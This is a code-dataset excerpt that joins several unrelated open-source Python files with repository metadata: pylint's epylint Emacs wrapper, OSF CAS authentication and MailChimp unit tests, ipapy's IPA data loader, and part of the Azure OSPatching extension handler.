return hook.check_for_prefix(self.container_name, self.prefix,
**self.check_options)
| apache-2.0 | 7,009,662,320,566,134,000 | 36.333333 | 75 | 0.650974 | false |
gkarlin/django-jenkins | build/pylint/epylint.py | 3 | 6363 | # -*- coding: utf-8; mode: python; tab-width: 4; indent-tabs-mode: nil; c-basic-offset: 4 -*- vim:fenc=utf-8:ft=python:et:sw=4:ts=4:sts=4
# Copyright (c) 2003-2012 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:[email protected]
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""Emacs and Flymake compatible Pylint.
This script is for integration with emacs and is compatible with flymake mode.
epylint walks out of python packages before invoking pylint. This avoids
reporting import errors that occur when a module within a package uses the
absolute import path to get another module within this package.
For example:
- Suppose a package is structured as
a/__init__.py
a/b/x.py
a/c/y.py
- Then if y.py imports x as "from a.b import x" the following produces pylint errors
cd a/c; pylint y.py
- The following obviously doesn't
pylint a/c/y.py
- As this script will be invoked by emacs within the directory of the file
we are checking we need to go out of it to avoid these false positives.
You may also use py_run to run pylint with desired options and get back (or not) its output.
"""
import sys, os, re
from subprocess import Popen, PIPE
def lint(filename):
"""Pylint the given file.
When run from emacs we will be in the directory of a file, and passed its filename.
If this file is part of a package and is trying to import other modules from within
its own package or another package rooted in a directory below it, pylint will classify
it as a failed import.
To get around this, we traverse down the directory tree to find the root of the package this
module is in. We then invoke pylint from this directory.
Finally, we must correct the filenames in the output generated by pylint so Emacs doesn't
become confused (it will expect just the original filename, while pylint may extend it with
extra directories if we've traversed down the tree)
"""
# traverse downwards until we are out of a python package
fullPath = os.path.abspath(filename)
parentPath, childPath = os.path.dirname(fullPath), os.path.basename(fullPath)
while parentPath != "/" and os.path.exists(os.path.join(parentPath, '__init__.py')):
childPath = os.path.join(os.path.basename(parentPath), childPath)
parentPath = os.path.dirname(parentPath)
# Start pylint
# Ensure we use the python and pylint associated with the running epylint
lintPath = os.path.join(os.path.dirname(__file__), 'lint.py')
cmd = [sys.executable, lintPath, '-f', 'parseable', '-r', 'n',
'--disable=C,R,I', childPath]
process = Popen(cmd, stdout=PIPE, stderr=PIPE, cwd=parentPath)
# The parseable line format is '%(path)s:%(line)s: [%(sigle)s%(obj)s] %(msg)s'
# NOTE: This would be cleaner if we added an Emacs reporter to pylint.reporters.text ..
regex = re.compile(r"\[(?P<type>[WE])(?P<remainder>.*?)\]")
def _replacement(mObj):
"Alter to include 'Error' or 'Warning'"
if mObj.group("type") == "W":
replacement = "Warning"
else:
replacement = "Error"
# replace as "Warning (W0511, funcName): Warning Text"
return "%s (%s%s):" % (replacement, mObj.group("type"), mObj.group("remainder"))
for line in process.stdout:
# remove pylintrc warning
if line.startswith("No config file found"):
continue
line = regex.sub(_replacement, line, 1)
        # modify the file name that's output to reverse the path traversal we made
parts = line.split(":")
if parts and parts[0] == childPath:
line = ":".join([filename] + parts[1:])
print line,
process.wait()
return process.returncode
def py_run(command_options='', return_std=False, stdout=None, stderr=None,
script='epylint'):
"""Run pylint from python (needs Python >= 2.4).
``command_options`` is a string containing ``pylint`` command line options;
    ``return_std`` (boolean) indicates return of created standard output
    and error (see below);
    ``stdout`` and ``stderr`` are 'file-like' objects in which standard output
    could be written.
    The calling agent is responsible for stdout/err management (creation, close).
    Default standard output and error are those from sys,
    or standalone ones (``subprocess.PIPE``) are used
    if they are not set and ``return_std``.
    If ``return_std`` is set to ``True``, this function returns a 2-tuple
    containing the standard output and error related to the created process,
as follows: ``(stdout, stderr)``.
A trivial usage could be as follows:
>>> py_run( '--version')
No config file found, using default configuration
pylint 0.18.1,
...
    To silently run Pylint on a module, and get its standard output and error:
>>> (pylint_stdout, pylint_stderr) = py_run( 'module_name.py', True)
"""
# Create command line to call pylint
if os.name == 'nt':
script += '.bat'
command_line = script + ' ' + command_options
    # Providing standard output and/or error if not set
if stdout is None:
if return_std:
stdout = PIPE
else:
stdout = sys.stdout
if stderr is None:
if return_std:
stderr = PIPE
else:
stderr = sys.stderr
# Call pylint in a subprocess
p = Popen(command_line, shell=True, stdout=stdout, stderr=stderr)
p.wait()
    # Return standard output and error
if return_std:
return (p.stdout, p.stderr)
def Run():
sys.exit(lint(sys.argv[1]))
if __name__ == '__main__':
Run()
| lgpl-3.0 | -1,224,322,329,500,459,000 | 37.563636 | 137 | 0.664938 | false |
brianjgeiger/osf.io | tests/test_cas_authentication.py | 4 | 14397 | # -*- coding: utf-8 -*-
import furl
import responses
import mock
from nose.tools import * # noqa: F403
import unittest
from framework.auth import cas
from tests.base import OsfTestCase, fake
from osf_tests.factories import UserFactory
def make_successful_response(user):
return cas.CasResponse(
authenticated=True,
user=user._id,
attributes={
'accessToken': fake.md5()
}
)
def make_failure_response():
return cas.CasResponse(
authenticated=False,
user=None,
)
def make_external_response(release=True, unicode=False):
attributes = {
'accessToken': fake.md5(),
}
if release:
attributes.update({
'given-names': fake.first_name() if not unicode else u'нет',
'family-name': fake.last_name() if not unicode else u'Да',
})
return cas.CasResponse(
authenticated=True,
user='OrcidProfile#{}'.format(fake.numerify('####-####-####-####')),
attributes=attributes
)
def generate_external_user_with_resp(service_url, user=True, release=True):
"""
Generate mock user, external credential and cas response for tests.
:param service_url: the service url
    :param user: set to `False` if the user does not exist
:param release: set to `False` if attributes are not released due to privacy settings
:return: existing user object or new user, valid external credential, valid cas response
"""
cas_resp = make_external_response(release=release)
validated_credentials = cas.validate_external_credential(cas_resp.user)
if user:
user = UserFactory.build()
user.external_identity = {
validated_credentials['provider']: {
validated_credentials['id']: 'VERIFIED'
}
}
user.save()
return user, validated_credentials, cas_resp
else:
user = {
'external_id_provider': validated_credentials['provider'],
'external_id': validated_credentials['id'],
'fullname': '',
'access_token': cas_resp.attributes['accessToken'],
'service_url': service_url,
}
return user, validated_credentials, cas_resp
RESPONSE_TEMPLATE = """
<cas:serviceResponse xmlns:cas='http://www.yale.edu/tp/cas'>
<cas:authenticationSuccess>
<cas:user>{user_id}</cas:user>
<cas:attributes>
<cas:isFromNewLogin>true</cas:isFromNewLogin>
<cas:authenticationDate>Tue May 19 02:20:19 UTC 2015</cas:authenticationDate>
<cas:givenName>{given_name}</cas:givenName>
<cas:familyName>{family_name}</cas:familyName>
<cas:longTermAuthenticationRequestTokenUsed>true</cas:longTermAuthenticationRequestTokenUsed>
<cas:accessToken>{access_token}</cas:accessToken>
<cas:username>{username}</cas:username>
</cas:attributes>
</cas:authenticationSuccess>
</cas:serviceResponse>
"""
def make_service_validation_response_body(user, access_token=None):
token = access_token or fake.md5()
return RESPONSE_TEMPLATE.format(
user_id=user._id,
given_name=user.given_name,
family_name=user.family_name,
username=user.username,
access_token=token
)
def test_parse_authorization_header():
token = fake.md5()
valid = 'Bearer {}'.format(token)
assert_equal(cas.parse_auth_header(valid), token)
missing_token = 'Bearer '
with assert_raises(cas.CasTokenError):
cas.parse_auth_header(missing_token)
class TestCASClient(OsfTestCase):
def setUp(self):
OsfTestCase.setUp(self)
self.base_url = 'http://accounts.test.test'
self.client = cas.CasClient(self.base_url)
@responses.activate
def test_service_validate(self):
user = UserFactory()
url = furl.furl(self.base_url)
url.path.segments.extend(('p3', 'serviceValidate',))
service_url = 'http://test.osf.io'
ticket = fake.md5()
body = make_service_validation_response_body(user, ticket)
responses.add(
responses.Response(
responses.GET,
url.url,
body=body,
status=200,
)
)
resp = self.client.service_validate(ticket, service_url)
assert_true(resp.authenticated)
@responses.activate
def test_service_validate_invalid_ticket_raises_error(self):
url = furl.furl(self.base_url)
url.path.segments.extend(('p3', 'serviceValidate',))
service_url = 'http://test.osf.io'
# Return error response
responses.add(
responses.Response(
responses.GET,
url.url,
body='invalid ticket...',
status=500,
)
)
with assert_raises(cas.CasHTTPError):
self.client.service_validate('invalid', service_url)
@responses.activate
def test_profile_invalid_access_token_raises_error(self):
url = furl.furl(self.base_url)
url.path.segments.extend(('oauth2', 'profile',))
responses.add(
responses.Response(
responses.GET,
url.url,
status=500,
)
)
with assert_raises(cas.CasHTTPError):
self.client.profile('invalid-access-token')
@responses.activate
def test_application_token_revocation_succeeds(self):
url = self.client.get_auth_token_revocation_url()
        client_id = 'fake_id'
client_secret = 'fake_secret'
responses.add(
responses.Response(
responses.POST,
url,
body={'client_id': client_id,
'client_secret': client_secret},
status=204
)
)
res = self.client.revoke_application_tokens(client_id, client_secret)
assert_equal(res, True)
@responses.activate
def test_application_token_revocation_fails(self):
url = self.client.get_auth_token_revocation_url()
        client_id = 'fake_id'
client_secret = 'fake_secret'
responses.add(
responses.Response(
responses.POST,
url,
body={'client_id': client_id,
'client_secret': client_secret},
status=400
)
)
with assert_raises(cas.CasHTTPError):
res = self.client.revoke_application_tokens(client_id, client_secret)
@unittest.skip('finish me')
def test_profile_valid_access_token_returns_cas_response(self):
assert 0
@unittest.skip('finish me')
def test_get_login_url(self):
assert 0
@unittest.skip('finish me')
def test_get_logout_url(self):
assert 0
class TestCASTicketAuthentication(OsfTestCase):
def setUp(self):
OsfTestCase.setUp(self)
self.user = UserFactory()
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_success(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_service_validate.return_value = make_successful_response(self.user)
mock_get_user_from_cas_resp.return_value = (self.user, None, 'authenticate')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
assert_equal(mock_get_user_from_cas_resp.call_count, 1)
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_failure(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_service_validate.return_value = make_failure_response()
mock_get_user_from_cas_resp.return_value = (None, None, None)
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
assert_equal(mock_get_user_from_cas_resp.call_count, 0)
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_invalidates_verification_key(self, mock_service_validate):
self.user.verification_key = fake.md5()
self.user.save()
mock_service_validate.return_value = make_successful_response(self.user)
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
self.user.reload()
assert_true(self.user.verification_key is None)
class TestCASExternalLogin(OsfTestCase):
def setUp(self):
super(TestCASExternalLogin, self).setUp()
self.user = UserFactory()
def test_get_user_from_cas_resp_already_authorized(self):
mock_response = make_external_response()
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
user, external_credential, action = cas.get_user_from_cas_resp(mock_response)
assert_equal(user._id, self.user._id)
assert_equal(external_credential, validated_creds)
assert_equal(action, 'authenticate')
def test_get_user_from_cas_resp_not_authorized(self):
user, external_credential, action = cas.get_user_from_cas_resp(make_external_response())
assert_equal(user, None)
assert_true(external_credential is not None)
assert_equal(action, 'external_first_login')
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_with_user(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
mock_get_user_from_cas_resp.return_value = (self.user, validated_creds, 'authenticate')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(mock_service_validate.call_count, 1)
        assert_equal(mock_get_user_from_cas_resp.call_count, 1)
assert_equal(resp.status_code, 302)
assert_in('/logout?service=', resp.headers['Location'])
assert_in('/login?service=', resp.headers['Location'])
@mock.patch('framework.auth.cas.get_user_from_cas_resp')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_no_user(self, mock_service_validate, mock_get_user_from_cas_resp):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
validated_creds = cas.validate_external_credential(mock_response.user)
mock_get_user_from_cas_resp.return_value = (None, validated_creds, 'external_first_login')
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(mock_service_validate.call_count, 1)
        assert_equal(mock_get_user_from_cas_resp.call_count, 1)
assert_equal(resp.status_code, 302)
assert_equal(resp.location, '/external-login/email')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_generates_new_verification_key(self, mock_service_validate):
self.user.verification_key = fake.md5()
self.user.save()
mock_response = make_external_response()
validated_creds = cas.validate_external_credential(mock_response.user)
self.user.external_identity = {
validated_creds['provider']: {
validated_creds['id']: 'VERIFIED'
}
}
self.user.save()
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
verification_key = self.user.verification_key
resp = cas.make_response_from_ticket(ticket, service_url)
self.user.reload()
assert_not_equal(self.user.verification_key, verification_key)
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_handles_unicode(self, mock_service_validate):
mock_response = make_external_response(unicode=True)
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
first_call_args = mock_service_validate.call_args[0]
assert_equal(first_call_args[0], ticket)
assert_equal(first_call_args[1], 'http://localhost:5000/')
@mock.patch('framework.auth.cas.CasClient.service_validate')
def test_make_response_from_ticket_handles_non_unicode(self, mock_service_validate):
mock_response = make_external_response()
mock_service_validate.return_value = mock_response
ticket = fake.md5()
service_url = 'http://localhost:5000/'
resp = cas.make_response_from_ticket(ticket, service_url)
assert_equal(resp.status_code, 302)
assert_equal(mock_service_validate.call_count, 1)
first_call_args = mock_service_validate.call_args[0]
assert_equal(first_call_args[0], ticket)
assert_equal(first_call_args[1], 'http://localhost:5000/')
| apache-2.0 | 7,033,508,628,497,800,000 | 37.792453 | 117 | 0.627501 | false |
pettarin/ipapy | ipapy/data/__init__.py | 1 | 8249 | #!/usr/bin/env python
# coding=utf-8
"""
ipapy contains data and functions to work with IPA strings.
This module defines data constants and it loads the built-in IPA database.
"""
from __future__ import absolute_import
from __future__ import print_function
import io
import re
import os
from ipapy.compatibility import hex_to_unichr
from ipapy.ipachar import IPAConsonant
from ipapy.ipachar import IPAVowel
from ipapy.ipachar import IPADiacritic
from ipapy.ipachar import IPASuprasegmental
from ipapy.ipachar import IPATone
__author__ = "Alberto Pettarin"
__copyright__ = "Copyright 2016-2019, Alberto Pettarin (www.albertopettarin.it)"
__license__ = "MIT"
__email__ = "[email protected]"
DATA_FILE_CODEPOINT_JOINER = u"_"
"""
Character to specify Unicode compound strings,
e.g. 0070_032A or U+0070_U+032A = LATIN SMALL LETTER P + COMBINING BRIDGE BELOW
"""
DATA_FILE_CODEPOINT_SEPARATOR = u" "
"""
Separator between Unicode codepoints or
Unicode compound strings for a given IPAChar
"""
DATA_FILE_COMMENT = u"#"
""" Ignore lines starting with this character """
DATA_FILE_FIELD_SEPARATOR = u","
""" Field separator for the data file """
DATA_FILE_VALUE_NOT_AVAILABLE = u"N/A"
""" Placeholder for an IPAChar not encoded in Unicode """
DATA_FILE_ASCII_NUMERICAL_CODEPOINT_START = u"00"
""" Numerical codepoints in ASCII fields must start with this string """
DATA_FILE_ASCII_UNICODE_CODEPOINT_START = u"U+"
""" Unicode codepoints in ASCII fields must start with this string """
def convert_unicode_field(string):
"""
Convert a Unicode field into the corresponding list of Unicode strings.
The (input) Unicode field is a Unicode string containing
one or more Unicode codepoints (``xxxx`` or ``U+xxxx`` or ``xxxx_yyyy``),
separated by a space.
:param str string: the (input) Unicode field
:rtype: list of Unicode strings
"""
values = []
for codepoint in [s for s in string.split(DATA_FILE_CODEPOINT_SEPARATOR) if (s != DATA_FILE_VALUE_NOT_AVAILABLE) and (len(s) > 0)]:
values.append(u"".join([hex_to_unichr(c) for c in codepoint.split(DATA_FILE_CODEPOINT_JOINER)]))
return values
def convert_ascii_field(string):
"""
Convert an ASCII field into the corresponding list of Unicode strings.
The (input) ASCII field is a Unicode string containing
one or more ASCII codepoints (``00xx`` or ``U+00xx`` or
an ASCII string not starting with ``00`` or ``U+``),
separated by a space.
:param str string: the (input) ASCII field
:rtype: list of Unicode strings
"""
values = []
for codepoint in [s for s in string.split(DATA_FILE_CODEPOINT_SEPARATOR) if (s != DATA_FILE_VALUE_NOT_AVAILABLE) and (len(s) > 0)]:
#if DATA_FILE_CODEPOINT_JOINER in codepoint:
# values.append(u"".join([hex_to_unichr(c) for c in codepoint.split(DATA_FILE_CODEPOINT_JOINER)]))
if (codepoint.startswith(DATA_FILE_ASCII_NUMERICAL_CODEPOINT_START)) or (codepoint.startswith(DATA_FILE_ASCII_UNICODE_CODEPOINT_START)):
values.append(hex_to_unichr(codepoint))
else:
values.append(codepoint)
return values
def convert_raw_tuple(value_tuple, format_string):
"""
Convert a tuple of raw values, according to the given line format.
:param tuple value_tuple: the tuple of raw values
:param str format_string: the format of the tuple
:rtype: list of tuples
"""
values = []
for v, c in zip(value_tuple, format_string):
if v is None:
# append None
values.append(v)
elif c == u"s":
# string
values.append(v)
elif c == u"S":
# string, split using space as delimiter
values.append([s for s in v.split(u" ") if len(s) > 0])
elif c == u"i":
# int
values.append(int(v))
elif c == u"U":
# Unicode
values.append(convert_unicode_field(v))
elif c == u"A":
# ASCII
values.append(convert_ascii_field(v))
#elif c == u"x":
# # ignore
# pass
return tuple(values)
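# Illustrative example (added for clarity; not in the original module): with the
# compact format string, "s" keeps the raw string and "U" expands Unicode
# codepoints into characters.
#
#     convert_raw_tuple((u"open front unrounded vowel", u"0061"), u"sU")
#     # => (u"open front unrounded vowel", [u"a"])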
def load_data_file(
file_path,
file_path_is_relative=False,
comment_string=DATA_FILE_COMMENT,
field_separator=DATA_FILE_FIELD_SEPARATOR,
line_format=None
):
"""
Load a data file, with one record per line and
fields separated by ``field_separator``,
returning a list of tuples.
It ignores lines starting with ``comment_string`` or empty lines.
    If ``line_format`` is not ``None``,
    each line (tuple) is checked to have
    the prescribed number of values and is parsed accordingly.
:param str file_path: path of the data file to load
:param bool file_path_is_relative: if ``True``, ``file_path`` is relative to this source code file
:param str comment_string: ignore lines starting with this string
:param str field_separator: fields are separated by this string
:param str line_format: if not ``None``, parses each line according to the given format
(``s`` = string, ``S`` = split string using spaces,
``i`` = int, ``x`` = ignore, ``U`` = Unicode, ``A`` = ASCII)
:rtype: list of tuples
"""
raw_tuples = []
if file_path_is_relative:
file_path = os.path.join(os.path.dirname(__file__), file_path)
with io.open(file_path, "r", encoding="utf-8") as f:
for line in f:
line = line.strip()
if (len(line) > 0) and (not line.startswith(comment_string)):
raw_list = line.split(field_separator)
                if (line_format is not None) and (len(raw_list) != len(line_format)):
raise ValueError("Data file '%s' contains a bad line: '%s'" % (file_path, line))
raw_tuples.append(tuple(raw_list))
if (line_format is None) or (len(line_format) < 1):
return raw_tuples
return [convert_raw_tuple(t, line_format) for t in raw_tuples]
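# Minimal usage sketch (assumes a data file shaped like the bundled ipa.dat,
# with comma-separated "description,codepoints" fields):
#
#     rows = load_data_file(
#         file_path=u"ipa.dat",
#         file_path_is_relative=True,
#         line_format=u"sU"
#     )
#     # each row is a tuple like (description_string, [unicode_strings])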
def load_ipa_data():
"""
Load the IPA data from the built-in IPA database, creating the following globals:
1. ``IPA_CHARS``: list of all IPAChar objects
2. ``UNICODE_TO_IPA``: dict mapping a Unicode string (often, a single char) to an IPAChar
3. ``UNICODE_TO_IPA_MAX_KEY_LENGTH``: length of a longest key in ``UNICODE_TO_IPA``
4. ``IPA_TO_UNICODE``: map an IPAChar canonical representation to the corresponding Unicode string (or char)
"""
ipa_signs = []
unicode_to_ipa = {}
ipa_to_unicode = {}
max_key_length = 0
for line in load_data_file(
file_path=u"ipa.dat",
file_path_is_relative=True,
line_format=u"sU"
):
# unpack data
i_desc, i_unicode_keys = line
name = re.sub(r" [ ]*", " ", i_desc)
# create a suitable IPACharacter obj
if u"consonant" in i_desc:
obj = IPAConsonant(name=name, descriptors=i_desc)
elif u"vowel" in i_desc:
obj = IPAVowel(name=name, descriptors=i_desc)
elif u"diacritic" in i_desc:
obj = IPADiacritic(name=name, descriptors=i_desc)
elif u"suprasegmental" in i_desc:
obj = IPASuprasegmental(name=name, descriptors=i_desc)
elif u"tone" in i_desc:
obj = IPATone(name=name, descriptors=i_desc)
else:
raise ValueError("The IPA data file contains a bad line, defining an unknown type: '%s'" % (line))
ipa_signs.append(obj)
# map Unicode codepoint to object, if the former is available
if len(i_unicode_keys) > 0:
# canonical Unicode string
first_key = i_unicode_keys[0]
ipa_to_unicode[obj.canonical_representation] = first_key
obj.unicode_repr = first_key
max_key_length = max(max_key_length, len(first_key))
# add all Unicode strings
for key in i_unicode_keys:
if key in unicode_to_ipa:
raise ValueError("The IPA data file contains a bad line, redefining codepoint '%s': '%s'" % (key, line))
unicode_to_ipa[key] = obj
return ipa_signs, unicode_to_ipa, max_key_length, ipa_to_unicode
IPA_CHARS, UNICODE_TO_IPA, UNICODE_TO_IPA_MAX_KEY_LENGTH, IPA_TO_UNICODE = load_ipa_data()
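# Example lookups against the globals built above (a sketch; the exact IPAChar
# returned depends on the bundled ipa.dat):
#
#     ipa_char = UNICODE_TO_IPA[u"a"]
#     unicode_repr = IPA_TO_UNICODE[ipa_char.canonical_representation]  # u"a"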
| mit | 2,773,272,724,314,759,700 | 36.325792 | 144 | 0.630864 | false |
MerlinZhang/osf.io | tests/test_mailchimp.py | 16 | 3743 | # -*- coding: utf-8 -*-
import mock
from website import mailchimp_utils
from tests.base import OsfTestCase
from nose.tools import * # noqa; PEP8 asserts
from tests.factories import UserFactory
import mailchimp
from framework.tasks import handlers
class TestMailChimpHelpers(OsfTestCase):
def setUp(self, *args, **kwargs):
super(TestMailChimpHelpers, self).setUp(*args, **kwargs)
with self.context:
handlers.celery_before_request()
@mock.patch('website.mailchimp_utils.get_mailchimp_api')
def test_get_list_id_from_name(self, mock_get_mailchimp_api):
list_name = 'foo'
mock_client = mock.MagicMock()
mock_get_mailchimp_api.return_value = mock_client
mock_client.lists.list.return_value = {'data': [{'id': 1, 'list_name': list_name}]}
list_id = mailchimp_utils.get_list_id_from_name(list_name)
mock_client.lists.list.assert_called_with(filters={'list_name': list_name})
assert_equal(list_id, 1)
@mock.patch('website.mailchimp_utils.get_mailchimp_api')
def test_get_list_name_from_id(self, mock_get_mailchimp_api):
list_id = '12345'
mock_client = mock.MagicMock()
mock_get_mailchimp_api.return_value = mock_client
mock_client.lists.list.return_value = {'data': [{'id': list_id, 'name': 'foo'}]}
list_name = mailchimp_utils.get_list_name_from_id(list_id)
mock_client.lists.list.assert_called_with(filters={'list_id': list_id})
assert_equal(list_name, 'foo')
@mock.patch('website.mailchimp_utils.get_mailchimp_api')
def test_subscribe_called_with_correct_arguments(self, mock_get_mailchimp_api):
list_name = 'foo'
user = UserFactory()
mock_client = mock.MagicMock()
mock_get_mailchimp_api.return_value = mock_client
mock_client.lists.list.return_value = {'data': [{'id': 1, 'list_name': list_name}]}
list_id = mailchimp_utils.get_list_id_from_name(list_name)
mailchimp_utils.subscribe_mailchimp(list_name, user._id)
handlers.celery_teardown_request()
mock_client.lists.subscribe.assert_called_with(
id=list_id,
email={'email': user.username},
merge_vars={
'fname': user.given_name,
'lname': user.family_name,
},
double_optin=False,
update_existing=True,
)
@mock.patch('website.mailchimp_utils.get_mailchimp_api')
def test_subscribe_fake_email_does_not_throw_validation_error(self, mock_get_mailchimp_api):
list_name = 'foo'
user = UserFactory(username='[email protected]')
mock_client = mock.MagicMock()
mock_get_mailchimp_api.return_value = mock_client
mock_client.lists.list.return_value = {'data': [{'id': 1, 'list_name': list_name}]}
mock_client.lists.subscribe.side_effect = mailchimp.ValidationError
mailchimp_utils.subscribe_mailchimp(list_name, user._id)
handlers.celery_teardown_request()
assert_false(user.mailing_lists[list_name])
@mock.patch('website.mailchimp_utils.get_mailchimp_api')
def test_unsubscribe_called_with_correct_arguments(self, mock_get_mailchimp_api):
list_name = 'foo'
user = UserFactory()
mock_client = mock.MagicMock()
mock_get_mailchimp_api.return_value = mock_client
mock_client.lists.list.return_value = {'data': [{'id': 2, 'list_name': list_name}]}
list_id = mailchimp_utils.get_list_id_from_name(list_name)
mailchimp_utils.unsubscribe_mailchimp(list_name, user._id)
handlers.celery_teardown_request()
mock_client.lists.unsubscribe.assert_called_with(id=list_id, email={'email': user.username})
| apache-2.0 | 3,636,353,774,546,548,000 | 45.209877 | 100 | 0.650815 | false |
Azure/azure-linux-extensions | OSPatching/handler.py | 5 | 17340 | #!/usr/bin/python
#
# OSPatching extension
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+
import os
import sys
import re
import time
import json
import tempfile
import urllib2
import urlparse
import platform
import shutil
import traceback
import logging
from azure.storage import BlobService
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as Util
from patch import *
# Global variables definition
ExtensionShortName = "OSPatching"
DownloadDirectory = 'download'
idleTestScriptName = "idleTest.py"
healthyTestScriptName = "healthyTest.py"
def install():
hutil.do_parse_context('Install')
try:
MyPatching.install()
hutil.do_exit(0, 'Install', 'success', '0', 'Install Succeeded.')
except Exception, e:
hutil.error("Failed to install the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Install', 'error', '0', 'Install Failed.')
def enable():
hutil.log("WARNING: The OSPatching extension for Linux has been deprecated. "
"Please see the GitHub project "
"(https://github.com/Azure/azure-linux-extensions/tree/master/OSPatching) "
"for more information.")
hutil.do_parse_context('Enable')
try:
protected_settings = hutil.get_protected_settings()
public_settings = hutil.get_public_settings()
if protected_settings:
settings = protected_settings.copy()
else:
settings = dict()
if public_settings:
settings.update(public_settings)
MyPatching.parse_settings(settings)
# Ensure the same configuration is executed only once
hutil.exit_if_seq_smaller()
oneoff = settings.get("oneoff")
download_customized_vmstatustest()
copy_vmstatustestscript(hutil.get_seq_no(), oneoff)
MyPatching.enable()
current_config = MyPatching.get_current_config()
hutil.do_exit(0, 'Enable', 'warning', '0', 'Enable Succeeded. OSPatching is deprecated. See https://github.com/Azure/azure-linux-extensions/tree/master/OSPatching for more info. Current Configuration: ' + current_config)
except Exception, e:
current_config = MyPatching.get_current_config()
hutil.error("Failed to enable the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
        hutil.do_exit(1, 'Enable', 'error', '0', 'Enable Failed. Current Configuration: ' + current_config)
def uninstall():
hutil.do_parse_context('Uninstall')
hutil.do_exit(0, 'Uninstall', 'success', '0', 'Uninstall Succeeded.')
def disable():
hutil.do_parse_context('Disable')
try:
MyPatching.disable()
hutil.do_exit(0, 'Disable', 'success', '0', 'Disable Succeeded.')
except Exception, e:
hutil.error("Failed to disable the extension with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
hutil.do_exit(1, 'Disable', 'error', '0', 'Disable Failed.')
def update():
    hutil.do_parse_context('Update')
hutil.do_exit(0, 'Update', 'success', '0', 'Update Succeeded.')
def download():
hutil.do_parse_context('Download')
try:
protected_settings = hutil.get_protected_settings()
public_settings = hutil.get_public_settings()
if protected_settings:
settings = protected_settings.copy()
else:
settings = dict()
if public_settings:
settings.update(public_settings)
MyPatching.parse_settings(settings)
MyPatching.download()
current_config = MyPatching.get_current_config()
        hutil.do_exit(0, 'Enable', 'success', '0', 'Download Succeeded. Current Configuration: ' + current_config)
except Exception, e:
current_config = MyPatching.get_current_config()
hutil.error("Failed to download updates with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
        hutil.do_exit(1, 'Enable', 'error', '0', 'Download Failed. Current Configuration: ' + current_config)
def patch():
hutil.do_parse_context('Patch')
try:
protected_settings = hutil.get_protected_settings()
public_settings = hutil.get_public_settings()
if protected_settings:
settings = protected_settings.copy()
else:
settings = dict()
if public_settings:
settings.update(public_settings)
MyPatching.parse_settings(settings)
MyPatching.patch()
current_config = MyPatching.get_current_config()
        hutil.do_exit(0, 'Enable', 'success', '0', 'Patch Succeeded. Current Configuration: ' + current_config)
except Exception, e:
current_config = MyPatching.get_current_config()
hutil.error("Failed to patch with error: %s, stack trace: %s" %(str(e), traceback.format_exc()))
        hutil.do_exit(1, 'Enable', 'error', '0', 'Patch Failed. Current Configuration: ' + current_config)
def oneoff():
hutil.do_parse_context('Oneoff')
try:
protected_settings = hutil.get_protected_settings()
public_settings = hutil.get_public_settings()
if protected_settings:
settings = protected_settings.copy()
else:
settings = dict()
if public_settings:
settings.update(public_settings)
MyPatching.parse_settings(settings)
MyPatching.patch_one_off()
